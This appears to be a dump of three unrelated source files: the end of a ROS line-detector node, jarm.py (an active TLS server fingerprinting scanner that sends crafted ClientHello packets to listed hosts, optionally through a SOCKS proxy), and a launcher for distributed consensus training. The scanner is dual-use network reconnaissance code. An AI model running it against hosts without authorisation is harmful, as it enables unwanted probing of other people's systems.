x1,y1,x2,y2 = lines[i, :]
lines[i, :] = [x2,y2,x1,y1]
return lines,normals
โ
class Stats():
def __init__(self):
self.nresets = 0
self.reset()
def reset(self):
self.nresets += 1
self.t0 = time.time()
self.nreceived = 0
self.nskipped = 0
self.nprocessed = 0
def received(self):
if self.nreceived == 0 and self.nresets == 1:
rospy.loginfo('line_detector_node received first image.')
self.nreceived += 1
def skipped(self):
self.nskipped += 1
def processed(self):
if self.nprocessed == 0 and self.nresets == 1:
rospy.loginfo('line_detector_node processing first image.')
self.nprocessed += 1
def info(self):
delta = time.time() - self.t0
if self.nreceived:
skipped_perc = (100.0 * self.nskipped / self.nreceived)
else:
skipped_perc = 0
def fps(x):
return '%.1f fps' % (x / delta)
m = ('In the last %.1f s: received %d (%s) processed %d (%s) skipped %d (%s) (%1.f%%)' %
(delta, self.nreceived, fps(self.nreceived),
self.nprocessed, fps(self.nprocessed),
self.nskipped, fps(self.nskipped), skipped_perc))
return m
if __name__ == '__main__':
rospy.init_node('line_detector',anonymous=False)
line_detector_node = LineDetectorNode()
rospy.on_shutdown(line_detector_node.onShutdown)
rospy.spin()
|
jarm.py | # Version 1.0 (November 2020)
#
# Created by:
# John Althouse
# Andrew Smart
# RJ Nunaly
# Mike Brady
#
# Converted to Python by:
# Caleb Yu
#
# Added multiprocessing by:
# Leo M. Falcon (https://github.com/A3sal0n)
#
# Copyright (c) 2020, salesforce.com, inc.
# All rights reserved.
# Licensed under the BSD 3-Clause license.
# For full license text, see LICENSE.txt file in the repo root or https://opensource.org/licenses/BSD-3-Clause
#
from __future__ import print_function
import codecs
import socket
import struct
import os
import sys
import random
import argparse
import hashlib
import ipaddress
import time
from queue import Queue
from threading import Thread
parser = argparse.ArgumentParser(description="Enter an IP address and port to scan.")
group = parser.add_mutually_exclusive_group()
group.add_argument("scan", nargs='?', help="Enter an IP or domain to scan.")
group.add_argument("-i", "--input", help="Provide a list of IP addresses or domains to scan, one domain or IP address per line. Optional: Specify port to scan with comma separation (e.g. 8.8.4.4,853).", type=str)
parser.add_argument("-p", "--port", help="Enter a port to scan (default 443).", type=int)
parser.add_argument("-v", "--verbose", help="Verbose mode: displays the JARM results before being hashed.", action="store_true")
parser.add_argument("-V", "--version", help="Print out version and exit.", action="store_true")
parser.add_argument("-o", "--output", help="Provide a filename to output/append results to a CSV file.", type=str)
parser.add_argument("-j", "--json", help="Output ndjson (either to file or stdout; overrides --output defaults to CSV)", action="store_true")
parser.add_argument("-P", "--proxy", help="To use a SOCKS5 proxy, provide address:port.", type=str)
args = parser.parse_args()
if args.version:
print("JARM version 1.0")
exit()
if not (args.scan or args.input):
parser.error("A domain/IP to scan or an input file is required.")
#Randomly choose a grease value
def choose_grease():
grease_list = [b"\x0a\x0a", b"\x1a\x1a", b"\x2a\x2a", b"\x3a\x3a", b"\x4a\x4a", b"\x5a\x5a", b"\x6a\x6a", b"\x7a\x7a", b"\x8a\x8a", b"\x9a\x9a", b"\xaa\xaa", b"\xba\xba", b"\xca\xca", b"\xda\xda", b"\xea\xea", b"\xfa\xfa"]
return random.choice(grease_list)
def packet_building(jarm_details):
payload = b"\x16"
#Version Check
if jarm_details[2] == "TLS_1.3":
payload += b"\x03\x01"
client_hello = b"\x03\x03"
elif jarm_details[2] == "SSLv3":
payload += b"\x03\x00"
client_hello = b"\x03\x00"
elif jarm_details[2] == "TLS_1":
payload += b"\x03\x01"
client_hello = b"\x03\x01"
elif jarm_details[2] == "TLS_1.1":
payload += b"\x03\x02"
client_hello = b"\x03\x02"
elif jarm_details[2] == "TLS_1.2":
payload += b"\x03\x03"
client_hello = b"\x03\x03"
#Random values in client hello
client_hello += os.urandom(32)
session_id = os.urandom(32)
session_id_length = struct.pack(">B", len(session_id))
client_hello += session_id_length
client_hello += session_id
#Get ciphers
cipher_choice = get_ciphers(jarm_details)
client_suites_length = struct.pack(">H", len(cipher_choice))
client_hello += client_suites_length
client_hello += cipher_choice
client_hello += b"\x01" #cipher methods
client_hello += b"\x00" #compression_methods
#Add extensions to client hello
extensions = get_extensions(jarm_details)
client_hello += extensions
#Finish packet assembly
inner_length = b"\x00"
inner_length += struct.pack(">H", len(client_hello))
handshake_protocol = b"\x01"
handshake_protocol += inner_length
handshake_protocol += client_hello
outer_length = struct.pack(">H", len(handshake_protocol))
payload += outer_length
payload += handshake_protocol
return payload
def get_ciphers(jarm_details):
selected_ciphers = b""
#Two cipher lists: NO1.3 and ALL
if jarm_details[3] == "ALL":
list = [b"\x00\x16", b"\x00\x33", b"\x00\x67", b"\xc0\x9e", b"\xc0\xa2", b"\x00\x9e", b"\x00\x39", b"\x00\x6b", b"\xc0\x9f", b"\xc0\xa3", b"\x00\x9f", b"\x00\x45", b"\x00\xbe", b"\x00\x88", b"\x00\xc4", b"\x00\x9a", b"\xc0\x08", b"\xc0\x09", b"\xc0\x23", b"\xc0\xac", b"\xc0\xae", b"\xc0\x2b", b"\xc0\x0a", b"\xc0\x24", b"\xc0\xad", b"\xc0\xaf", b"\xc0\x2c", b"\xc0\x72", b"\xc0\x73", b"\xcc\xa9", b"\x13\x02", b"\x13\x01", b"\xcc\x14", b"\xc0\x07", b"\xc0\x12", b"\xc0\x13", b"\xc0\x27", b"\xc0\x2f", b"\xc0\x14", b"\xc0\x28", b"\xc0\x30", b"\xc0\x60", b"\xc0\x61", b"\xc0\x76", b"\xc0\x77", b"\xcc\xa8", b"\x13\x05", b"\x13\x04", b"\x13\x03", b"\xcc\x13", b"\xc0\x11", b"\x00\x0a", b"\x00\x2f", b"\x00\x3c", b"\xc0\x9c", b"\xc0\xa0", b"\x00\x9c", b"\x00\x35", b"\x00\x3d", b"\xc0\x9d", b"\xc0\xa1", b"\x00\x9d", b"\x00\x41", b"\x00\xba", b"\x00\x84", b"\x00\xc0", b"\x00\x07", b"\x00\x04", b"\x00\x05"]
elif jarm_details[3] == "NO1.3":
list = [b"\x00\x16", b"\x00\x33", b"\x00\x67", b"\xc0\x9e", b"\xc0\xa2", b"\x00\x9e", b"\x00\x39", b"\x00\x6b", b"\xc0\x9f", b"\xc0\xa3", b"\x00\x9f", b"\x00\x45", b"\x00\xbe", b"\x00\x88", b"\x00\xc4", b"\x00\x9a", b"\xc0\x08", b"\xc0\x09", b"\xc0\x23", b"\xc0\xac", b"\xc0\xae", b"\xc0\x2b", b"\xc0\x0a", b"\xc0\x24", b"\xc0\xad", b"\xc0\xaf", b"\xc0\x2c", b"\xc0\x72", b"\xc0\x73", b"\xcc\xa9", b"\xcc\x14", b"\xc0\x07", b"\xc0\x12", b"\xc0\x13", b"\xc0\x27", b"\xc0\x2f", b"\xc0\x14", b"\xc0\x28", b"\xc0\x30", b"\xc0\x60", b"\xc0\x61", b"\xc0\x76", b"\xc0\x77", b"\xcc\xa8", b"\xcc\x13", b"\xc0\x11", b"\x00\x0a", b"\x00\x2f", b"\x00\x3c", b"\xc0\x9c", b"\xc0\xa0", b"\x00\x9c", b"\x00\x35", b"\x00\x3d", b"\xc0\x9d", b"\xc0\xa1", b"\x00\x9d", b"\x00\x41", b"\x00\xba", b"\x00\x84", b"\x00\xc0", b"\x00\x07", b"\x00\x04", b"\x00\x05"]
#Change cipher order
if jarm_details[4] != "FORWARD":
list = cipher_mung(list, jarm_details[4])
#Add GREASE to beginning of cipher list (if applicable)
if jarm_details[5] == "GREASE":
list.insert(0,choose_grease())
#Generate cipher list
for cipher in list:
selected_ciphers += cipher
return selected_ciphers
def cipher_mung(ciphers, request):
output = []
cipher_len = len(ciphers)
#Ciphers backward
if (request == "REVERSE"):
output = ciphers[::-1]
#Bottom half of ciphers
elif (request == "BOTTOM_HALF"):
if (cipher_len % 2 == 1):
output = ciphers[int(cipher_len/2)+1:]
else:
output = ciphers[int(cipher_len/2):]
#Top half of ciphers in reverse order
elif (request == "TOP_HALF"):
if (cipher_len % 2 == 1):
output.append(ciphers[int(cipher_len/2)])
#Top half gets the middle cipher
output += cipher_mung(cipher_mung(ciphers, "REVERSE"),"BOTTOM_HALF")
#Middle-out cipher order
elif (request == "MIDDLE_OUT"):
middle = int(cipher_len/2)
# if ciphers are uneven, start with the center. Second half before first half
if (cipher_len % 2 == 1):
output.append(ciphers[middle])
for i in range(1, middle+1):
output.append(ciphers[middle + i])
output.append(ciphers[middle - i])
else:
for i in range(1, middle+1):
output.append(ciphers[middle-1 + i])
output.append(ciphers[middle - i])
return output
def get_extensions(jarm_details):
extension_bytes = b""
all_extensions = b""
grease = False
#GREASE
if jarm_details[5] == "GREASE":
all_extensions += choose_grease()
all_extensions += b"\x00\x00"
grease = True
#Server name
all_extensions += extension_server_name(jarm_details[0])
#Other extensions
extended_master_secret = b"\x00\x17\x00\x00"
all_extensions += extended_master_secret
max_fragment_length = b"\x00\x01\x00\x01\x01"
all_extensions += max_fragment_length
renegotiation_info = b"\xff\x01\x00\x01\x00"
all_extensions += renegotiation_info
supported_groups = b"\x00\x0a\x00\x0a\x00\x08\x00\x1d\x00\x17\x00\x18\x00\x19"
all_extensions += supported_groups
ec_point_formats = b"\x00\x0b\x00\x02\x01\x00"
all_extensions += ec_point_formats
session_ticket = b"\x00\x23\x00\x00"
all_extensions += session_ticket
#Application Layer Protocol Negotiation extension
all_extensions += app_layer_proto_negotiation(jarm_details)
signature_algorithms = b"\x00\x0d\x00\x14\x00\x12\x04\x03\x08\x04\x04\x01\x05\x03\x08\x05\x05\x01\x08\x06\x06\x01\x02\x01"
all_extensions += signature_algorithms
#Key share extension
all_extensions += key_share(grease)
psk_key_exchange_modes = b"\x00\x2d\x00\x02\x01\x01"
all_extensions += psk_key_exchange_modes
#Supported versions extension
if (jarm_details[2] == "TLS_1.3") or (jarm_details[7] == "1.2_SUPPORT"):
all_extensions += supported_versions(jarm_details, grease)
#Finish assembling extensions
extension_length = len(all_extensions)
extension_bytes += struct.pack(">H", extension_length)
extension_bytes += all_extensions
return extension_bytes
#Client hello server name extension
def extension_server_name(host):
ext_sni = b"\x00\x00"
ext_sni_length = len(host)+5
ext_sni += struct.pack(">H", ext_sni_length)
ext_sni_length2 = len(host)+3
ext_sni += struct.pack(">H", ext_sni_length2)
ext_sni += b"\x00"
ext_sni_length3 = len(host)
ext_sni += struct.pack(">H", ext_sni_length3)
ext_sni += host.encode()
return ext_sni
#Client hello apln extension
def app_layer_proto_negotiation(jarm_details):
ext = b"\x00\x10"
if (jarm_details[6] == "RARE_APLN"):
#Removes h2 and http/1.1
alpns = [b"\x08\x68\x74\x74\x70\x2f\x30\x2e\x39", b"\x08\x68\x74\x74\x70\x2f\x31\x2e\x30", b"\x06\x73\x70\x64\x79\x2f\x31", b"\x06\x73\x70\x64\x79\x2f\x32", b"\x06\x73\x70\x64\x79\x2f\x33", b"\x03\x68\x32\x63", b"\x02\x68\x71"]
else:
#All apln extensions in order from weakest to strongest
alpns = [b"\x08\x68\x74\x74\x70\x2f\x30\x2e\x39", b"\x08\x68\x74\x74\x70\x2f\x31\x2e\x30", b"\x08\x68\x74\x74\x70\x2f\x31\x2e\x31", b"\x06\x73\x70\x64\x79\x2f\x31", b"\x06\x73\x70\x64\x79\x2f\x32", b"\x06\x73\x70\x64\x79\x2f\x33", b"\x02\x68\x32", b"\x03\x68\x32\x63", b"\x02\x68\x71"]
#apln extensions can be reordered
if jarm_details[8] != "FORWARD":
alpns = cipher_mung(alpns, jarm_details[8])
all_alpns = b""
for alpn in alpns:
all_alpns += alpn
second_length = len(all_alpns)
first_length = second_length+2
ext += struct.pack(">H", first_length)
ext += struct.pack(">H", second_length)
ext += all_alpns
return ext
#Generate key share extension for client hello
def key_share(grease):
ext = b"\x00\x33"
#Add grease value if necessary
if grease == True:
share_ext = choose_grease()
share_ext += b"\x00\x01\x00"
else:
share_ext = b""
group = b"\x00\x1d"
share_ext += group
key_exchange_length = b"\x00\x20"
share_ext += key_exchange_length
share_ext += os.urandom(32)
second_length = len(share_ext)
first_length = second_length+2
ext += struct.pack(">H", first_length)
ext += struct.pack(">H", second_length)
ext += share_ext
return ext
#Supported version extension for client hello
def supported_versions(jarm_details, grease):
if (jarm_details[7] == "1.2_SUPPORT"):
#TLS 1.3 is not supported
tls = [b"\x03\x01", b"\x03\x02", b"\x03\x03"]
else:
#TLS 1.3 is supported
tls = [b"\x03\x01", b"\x03\x02", b"\x03\x03", b"\x03\x04"]
#Change supported version order, by default, the versions are from oldest to newest
if jarm_details[8] != "FORWARD":
tls = cipher_mung(tls, jarm_details[8])
#Assemble the extension
ext = b"\x00\x2b"
#Add GREASE if applicable
if grease == True:
versions = choose_grease()
else:
versions = b""
for version in tls:
versions += version
second_length = len(versions)
first_length = second_length+1
ext += struct.pack(">H", first_length)
ext += struct.pack(">B", second_length)
ext += versions
return ext
#Send the assembled client hello using a socket
def send_packet(packet,dhost):
try:
#Determine if the input is an IP or domain name
try:
if (type(ipaddress.ip_address(dhost)) == ipaddress.IPv4Address) or (type(ipaddress.ip_address(dhost)) == ipaddress.IPv6Address):
raw_ip = True
ip = (dhost, destination_port)
except ValueError as e:
ip = (None, None)
raw_ip = False
#Connect the socket
if ":" in dhost:
if args.proxy:
sock = socks.socksocket(socket.AF_INET6, socket.SOCK_STREAM)
sock.set_proxy(socks.SOCKS5, proxyhost, proxyport)
else:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
#Timeout of 20 seconds
sock.settimeout(20)
sock.connect((dhost, destination_port, 0, 0))
else:
if args.proxy:
sock = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
sock.set_proxy(socks.SOCKS5, proxyhost, proxyport)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Timeout of 20 seconds
sock.settimeout(20)
sock.connect((dhost, destination_port))
#Resolve IP if given a domain name
if raw_ip == False:
ip = sock.getpeername()
# Retry IP resolution if it fails on the first attempt
if not ip:
for i in range(5):
ip = sock.getpeername()
time.sleep(0.2)
sock.sendall(packet)
#Receive server hello
data = sock.recv(1484)
#Close socket
sock.shutdown(socket.SHUT_RDWR)
sock.close()
return bytearray(data), ip[0]
#Timeout errors result in an empty hash
except socket.timeout as e:
sock.close()
return "TIMEOUT", ip[0]
except Exception as e:
sock.close()
return None, ip[0]
#If a packet is received, decipher the details
def read_packet(data, jarm_details):
try:
if data == None:
return "|||"
jarm = ""
#Server hello error
if data[0] == 21:
selected_cipher = b""
return "|||"
#Check for server hello
elif (data[0] == 22) and (data[5] == 2):
server_hello_length = int.from_bytes(data[3:5], "big")
counter = data[43]
#Find server's selected cipher
selected_cipher = data[counter+44:counter+46]
#Find server's selected version
version = data[9:11]
#Format
jarm += codecs.encode(selected_cipher, 'hex').decode('ascii')
jarm += "|"
jarm += codecs.encode(version, 'hex').decode('ascii')
jarm += "|"
#Extract extensions
extensions = (extract_extension_info(data, counter, server_hello_length))
jarm += extensions
return jarm
else:
return "|||"
except Exception as e:
return "|||"
#Deciphering the extensions in the server hello
def extract_extension_info(data, counter, server_hello_length):
try:
#Error handling
if (data[counter+47] == 11):
return "|"
elif (data[counter+50:counter+53] == b"\x0e\xac\x0b") or (data[82:85] == b"\x0f\xf0\x0b"):
return "|"
elif counter+42 >= server_hello_length:
return "|"
count = 49+counter
length = int(codecs.encode(data[counter+47:counter+49], 'hex'), 16)
maximum = length+(count-1)
types = []
values = []
#Collect all extension types and values for later reference
while count < maximum:
types.append(data[count:count+2])
ext_length = int(codecs.encode(data[count+2:count+4], 'hex'), 16)
if ext_length == 0:
count += 4
values.append("")
else:
values.append(data[count+4:count+4+ext_length])
count += ext_length+4
result = ""
#Read application_layer_protocol_negotiation
alpn = find_extension(b"\x00\x10", types, values)
result += str(alpn)
result += "|"
#Add formating hyphens
add_hyphen = 0
while add_hyphen < len(types):
result += codecs.encode(types[add_hyphen], 'hex').decode('ascii')
add_hyphen += 1
if add_hyphen == len(types):
break
else:
result += "-"
return result
#Error handling
except IndexError as e:
result = "|"
return result
#Matching cipher extensions to values
def find_extension(ext_type, types, values):
iter = 0
#For the APLN extension, grab the value in ASCII
if ext_type == b"\x00\x10":
while iter < len(types):
if types[iter] == ext_type:
return ((values[iter][3:]).decode())
iter += 1
else:
while iter < len(types):
if types[iter] == ext_type:
return values[iter].hex()
iter += 1
return ""
#Custom fuzzy hash
def jarm_hash(jarm_raw):
#If jarm is empty, 62 zeros for the hash
if jarm_raw == "|||,|||,|||,|||,|||,|||,|||,|||,|||,|||":
return "0"*62
fuzzy_hash = ""
handshakes = jarm_raw.split(",")
alpns_and_ext = ""
for handshake in handshakes:
components = handshake.split("|")
#Custom jarm hash includes a fuzzy hash of the ciphers and versions
fuzzy_hash += cipher_bytes(components[0])
fuzzy_hash += version_byte(components[1])
alpns_and_ext += components[2]
alpns_and_ext += components[3]
#Custom jarm hash has the sha256 of alpns and extensions added to the end
sha256 = (hashlib.sha256(alpns_and_ext.encode())).hexdigest()
fuzzy_hash += sha256[0:32]
return fuzzy_hash
#Fuzzy hash for ciphers is the index number (in hex) of the cipher in the list
def cipher_bytes(cipher):
if cipher == "":
return "00"
list = [b"\x00\x04", b"\x00\x05", b"\x00\x07", b"\x00\x0a", b"\x00\x16", b"\x00\x2f", b"\x00\x33", b"\x00\x35", b"\x00\x39", b"\x00\x3c", b"\x00\x3d", b"\x00\x41", b"\x00\x45", b"\x00\x67", b"\x00\x6b", b"\x00\x84", b"\x00\x88", b"\x00\x9a", b"\x00\x9c", b"\x00\x9d", b"\x00\x9e", b"\x00\x9f", b"\x00\xba", b"\x00\xbe", b"\x00\xc0", b"\x00\xc4", b"\xc0\x07", b"\xc0\x08", b"\xc0\x09", b"\xc0\x0a", b"\xc0\x11", b"\xc0\x12", b"\xc0\x13", b"\xc0\x14", b"\xc0\x23", b"\xc0\x24", b"\xc0\x27", b"\xc0\x28", b"\xc0\x2b", b"\xc0\x2c", b"\xc0\x2f", b"\xc0\x30", b"\xc0\x60", b"\xc0\x61", b"\xc0\x72", b"\xc0\x73", b"\xc0\x76", b"\xc0\x77", b"\xc0\x9c", b"\xc0\x9d", b"\xc0\x9e", b"\xc0\x9f", b"\xc0\xa0", b"\xc0\xa1", b"\xc0\xa2", b"\xc0\xa3", b"\xc0\xac", b"\xc0\xad", b"\xc0\xae", b"\xc0\xaf", b'\xcc\x13', b'\xcc\x14', b'\xcc\xa8', b'\xcc\xa9', b'\x13\x01', b'\x13\x02', b'\x13\x03', b'\x13\x04', b'\x13\x05']
count = 1
for bytes in list:
strtype_bytes = codecs.encode(bytes, 'hex').decode('ascii')
if cipher == strtype_bytes:
break
count += 1
hexvalue = str(hex(count))[2:]
#This part must always be two bytes
if len(hexvalue) < 2:
return_bytes = "0" + hexvalue
else:
return_bytes = hexvalue
return return_bytes
#This captures a single version byte based on version
def version_byte(version):
if version == "":
return "0"
options = "abcdef"
count = int(version[3:4])
byte = options[count]
return byte
def ParseNumber(number):
if number.startswith('0x'):
return int(number[2:], 16)
else:
return int(number)
def main(q):
while True:
dhost = q.get()
#Select the packets and formats to send
#Array format = [destination_host,destination_port,version,cipher_list,cipher_order,GREASE,RARE_APLN,1.3_SUPPORT,extension_orders]
tls1_2_forward = [dhost, destination_port, "TLS_1.2", "ALL", "FORWARD", "NO_GREASE", "APLN", "1.2_SUPPORT", "REVERSE"]
tls1_2_reverse = [dhost, destination_port, "TLS_1.2", "ALL", "REVERSE", "NO_GREASE", "APLN", "1.2_SUPPORT", "FORWARD"]
tls1_2_top_half = [dhost, destination_port, "TLS_1.2", "ALL", "TOP_HALF", "NO_GREASE", "APLN", "NO_SUPPORT", "FORWARD"]
tls1_2_bottom_half = [dhost, destination_port, "TLS_1.2", "ALL", "BOTTOM_HALF", "NO_GREASE", "RARE_APLN", "NO_SUPPORT", "FORWARD"]
tls1_2_middle_out = [dhost, destination_port, "TLS_1.2", "ALL", "MIDDLE_OUT", "GREASE", "RARE_APLN", "NO_SUPPORT", "REVERSE"]
tls1_1_middle_out = [dhost, destination_port, "TLS_1.1", "ALL", "FORWARD", "NO_GREASE", "APLN", "NO_SUPPORT", "FORWARD"]
tls1_3_forward = [dhost, destination_port, "TLS_1.3", "ALL", "FORWARD", "NO_GREASE", "APLN", "1.3_SUPPORT", "REVERSE"]
tls1_3_reverse = [dhost, destination_port, "TLS_1.3", "ALL", "REVERSE", "NO_GREASE", "APLN", "1.3_SUPPORT", "FORWARD"]
tls1_3_invalid = [dhost, destination_port, "TLS_1.3", "NO1.3", "FORWARD", "NO_GREASE", "APLN", "1.3_SUPPORT", "FORWARD"]
tls1_3_middle_out = [dhost, destination_port, "TLS_1.3", "ALL", "MIDDLE_OUT", "GREASE", "APLN", "1.3_SUPPORT", "REVERSE"]
#Possible versions: SSLv3, TLS_1, TLS_1.1, TLS_1.2, TLS_1.3
#Possible cipher lists: ALL, NO1.3
#GREASE: either NO_GREASE or GREASE
#APLN: either APLN or RARE_APLN
#Supported Verisons extension: 1.2_SUPPPORT, NO_SUPPORT, or 1.3_SUPPORT
#Possible Extension order: FORWARD, REVERSE
queue = [tls1_2_forward, tls1_2_reverse, tls1_2_top_half, tls1_2_bottom_half, tls1_2_middle_out, tls1_1_middle_out, tls1_3_forward, tls1_3_reverse, tls1_3_invalid, tls1_3_middle_out]
jarm = ""
#Assemble, send, and decipher each packet
iterate = 0
while iterate < len(queue):
payload = packet_building(queue[iterate])
server_hello, ip = send_packet(payload,dhost)
#Deal with timeout error
if server_hello == "TIMEOUT":
jarm = "|||,|||,|||,|||,|||,|||,|||,|||,|||,|||"
break
ans = read_packet(server_hello, queue[iterate])
jarm += ans
iterate += 1
if iterate == len(queue):
break
else:
jarm += ","
#Fuzzy hash
result = jarm_hash(jarm)
#Write to file
if args.output:
if ip != None:
if args.json:
file.write('{"host":"' + dhost + '","ip":"' + ip + '","result":"' + result + '"')
else:
file.write('{"host":"' + dhost + "," + ip + "," + result)
else:
file.write('{"host":"' + dhost + ",Failed to resolve IP," + result)
#Verbose mode adds pre-fuzzy-hashed JARM
if args.verbose:
if args.json:
file.write(',"jarm":"' + jarm + '"')
else:
file.write("," + jarm)
if args.json:
file.write("}")
file.write("\n")
#Print to STDOUT
else:
if ip != None:
if args.json:
sys.stdout.write('{"host":"' + dhost + '","ip":"' + ip + '","result":"' + result + '"')
else:
print("Domain: " + dhost)
print("Resolved IP: " + ip)
print("JARM: " + result)
else:
if args.json:
sys.stdout.write('{"host":"' + dhost + '","ip":null,"result":"' + result + '"')
else:
print("Domain: " + dhost)
print("Resolved IP: IP failed to resolve.")
print("JARM: " + result)
#Verbose mode adds pre-fuzzy-hashed JARM
if args.verbose:
if args.json:
sys.stdout.write(',"jarm":"' + jarm + '"')
else:
scan_count = 1
for round in jarm.split(","):
print("Scan " + str(scan_count) + ": " + round, end="")
if scan_count == len(jarm.split(",")):
print("\n",end="")
else:
print(",")
scan_count += 1
if args.json:
sys.stdout.write("}\n")
time.sleep(0.1)
q.task_done()
#set proxy
if args.proxy:
proxyhost, proxyport = args.proxy.split(':')
proxyport = ParseNumber(proxyport)
try:
import socks
except ImportError:
print('Option proxy requires PySocks: pip install PySocks')
exit()
#Set destination host and port
destination_host = args.scan
if args.port:
destination_port = int(args.port)
else:
destination_port = 443
#JSON output
if args.json:
file_ext = ".json"
else:
file_ext = ".csv"
#File output option
if args.output:
if args.json:
if args.output[-5:] != file_ext:
output_file = args.output + file_ext
else:
output_file = args.output
else:
if args.output[-4:] != file_ext:
output_file = args.output + file_ext
else:
output_file = args.output
file = open(output_file, "a+")
if args.input:
input_file = open(args.input, "r")
entries = input_file.readlines()
q = Queue(maxsize=0)
# Change the variable below to increase the number of threads if desired
num_threads = 8
for i in range(num_threads):
worker = Thread(target=main, args=(q,))
worker.setDaemon(True)
worker.start()
for entry in entries:
#entry = entry.strip()
port_check = entry.split(",")
if len(port_check) == 2:
destination_port = int(port_check[1][:-1])
destination_host = port_check[0]
else:
destination_host = entry[:-1]
q.put(destination_host)
q.join()
else:
print('This jarm version can only be executed using the --input option')
#Close files
if args.output:
file.close()
|
run_consensus.py | import argparse
import asyncio
import threading
import sys
import os
import time
sys.path.append('./distributed-learning/')
from utils.consensus_tcp import ConsensusMaster
import consensus_trainer
import consensus_master
parser = argparse.ArgumentParser()
parser.add_argument('--world-size', '-n', type=int,
help='You should either specify both world-size and topology'
' or use custom topology using topology-file option')
parser.add_argument('--topology', choices=['mesh', 'star', 'ring', 'torus', 'expander'], type=str)
parser.add_argument('--topology-file', type=str)
parser.add_argument('--validation-agents', type=str, help='e.g. --validation-agents="0,3,6" or --validation-agents="*"')
parser.add_argument('--do-resume', dest='do_resume', help='resume from checkpoint', action='store_true')
parser.add_argument('--consensus-freq', dest='consensus_frequency', type=int, default=1,
help='freq>0 -> do averaging <freq> times per batch, '
'freq<0 -> do averaging once per (-freq) batches')
parser.add_argument('--telemetry-freq-per-epoch', dest='telemetry_freq_per_epoch', type=int, default=3,
help='how many times to send telemetry to master per epoch')
# parser.add_argument('--use-consensus-rounds', dest='use_consensus_rounds', action='store_true',
# help='do consensus rounds instead of fixed number of consensus iterations')
# parser.add_argument('--consensus-rounds-precision', dest='consensus_rounds_precision', type=float, default=1e-4)
parser.add_argument('--use-lsr', dest='use_lsr', action='store_true')
parser.add_argument('--warmup', dest='warmup', default=0, type=int)
parser.add_argument('--momentum-consensus', dest='momentum_consensus', action='store_true')
parser.add_argument('-b', '--batch-size', default=32, type=int,
metavar='N', help='mini-batch size (default: 32)')
parser.add_argument('--master-host', default='127.0.0.1', type=str)
parser.add_argument('--master-port', default=8999, type=int)
parser.add_argument('--agent-start-port', default=11000, type=int)
parser.add_argument('--debug', dest='debug', action='store_true')
parser.add_argument('--print-freq', '-p', default=50, type=int,
metavar='N', help='print frequency (default: 50)')
def make_topology(args):
bad_args_msg = 'You should either specify both world-size and topology'\
' or use custom topology using topology-file option'
if args.world_size is not None and args.topology is not None:
n = args.world_size
if args.topology == 'mesh':
return [(i, j) for i in range(n) for j in range(i + 1, n)], n
elif args.topology == 'star':
return [(0, j) for j in range(1, n)], n
elif args.topology == 'ring':
return [(j, (j + 1) % n) for j in range(n)], n
elif args.topology == 'torus':
side = int(n ** 0.5)
if side * side != n:
raise ValueError('topology=torus => world size must be exact square')
return [ (
(layer * side + elem),
(layer * side + (elem + 1) % side)
) for elem in range(side) for layer in range(side)] \
+ \
[ (
(layer * side + elem),
((layer + 1) % side * side + elem)
) for elem in range(side) for layer in range(side)],\
n
elif args.topology == 'expander':
import networkx as nx
side = int(n ** 0.5)
if side * side != n:
raise ValueError('topology=expander => world size must be exact square')
G = nx.generators.expanders.margulis_gabber_galil_graph(side)
return [(side * u[0] + u[1], side * v[0] + v[1]) for u, v in G.edges()], n
else:
raise ValueError(bad_args_msg)
if args.topology_file is not None:
with open(args.topology_file, 'r') as f:
file_fmt_help = 'File should look like this:\n'\
'0 1\n'\
'1 2\n'\
'2 0\n\n'\
'Agent designations must be integers from 0 to n-1 where n is the total number of agents'
topology = []
agents = set()
try:
for line in f.readlines():
tokens = list(map(int, line.strip().split()))
if tokens:
if len(tokens) != 2:
raise ValueError('File is ill-formated')
agents.add(tokens[0])
agents.add(tokens[1])
topology.append((tokens[0], tokens[1]))
for i in range(len(agents)):
if i not in agents:
raise ValueError('File is ill-formated')
except Exception as e:
print(f'{e} happened while reading the topology file.\n' + file_fmt_help)
raise e
return topology, len(agents)
raise ValueError(bad_args_msg)
def extract_validation_agents(args, total_agents):
if args.validation_agents is None:
return []
if args.validation_agents == '*':
return list(range(total_agents))
try:
return list(map(int, args.validation_agents.strip().split(',')))
except Exception as e:
print('validation-agents option should look like this: "0" or "0,3,6" or "*"')
raise e
def run(args):
topology, total_agents = make_topology(args)
def make_master_task(): # actually returns a Future object
telemetry_processor = consensus_master.ResNet20TelemetryProcessor(
os.path.join(os.environ['CHECKPOINT_PATH'], 'telemetry.pickle'),
topology, resume=args.do_resume)
master = ConsensusMaster(topology, '127.0.0.1', args.master_port,
debug=True if args.debug else False,
telemetry_processor=telemetry_processor)
return master.serve_forever()
def run_task(loop, task):
asyncio.set_event_loop(loop)
loop.run_until_complete(task)
loop.close()
master_loop = asyncio.new_event_loop()
master_task = make_master_task()
master_thread = threading.Thread(target=run_task, args=(master_loop, master_task))
master_thread.start()
time.sleep(5.0) # let master initialize
validation_agents = extract_validation_agents(args, total_agents)
agent_threads = []
for token in range(total_agents):
cfg = consensus_trainer.make_config_parser()
agent_args = cfg.parse_args([
'--agent-token', f'{token}',
'--agent-host', f'{args.master_host}',
'--agent-port', f'{args.agent_start_port + token}',
'--master-host', f'{args.master_host}',
'--master-port', f'{args.master_port}',
'--total-agents', f'{total_agents}',
'--save-dir', os.environ['CHECKPOINT_PATH'],
'--use-prepared-data',
'--print-freq', f'{args.print_freq}'
]
+ (['--do-resume'] if args.do_resume else [])
+ (['--consensus-freq', f'{args.consensus_frequency}']
if args.consensus_frequency is not None else [])
+ (['--telemetry-freq-per-epoch', f'{args.telemetry_freq_per_epoch}']
if args.telemetry_freq_per_epoch is not None else [])
# + (['--use-consensus-rounds'] if args.use_consensus_rounds is not None else [])
# + (['--consensus-rounds-precision', f'{args.consensus_rounds_precision}']
# if args.consensus_rounds_precision is not None else [])
+ (['--use-lsr'] if args.use_lsr else [])
+ ([f'--warmup', f'{args.warmup}'] if args.warmup is not None else [])
+ (['--momentum-consensus'] if args.momentum_consensus else [])
+ (['--batch-size', f'{args.batch_size}'] if args.batch_size is not None else [])
+ (['--init-leader', '--enable-log'] if token == 0 else [])
+ (['--debug-consensus'] if args.debug else [])
+ ([] if token in validation_agents else ['--no-validation'])
)
loop = asyncio.new_event_loop()
thread = threading.Thread(target=run_task, args=(loop, consensus_trainer.main(agent_args)))
thread.start()
agent_threads.append(thread)
for t in agent_threads:
t.join()
master_loop.call_soon_threadsafe(master_loop.stop)
master_thread.join()
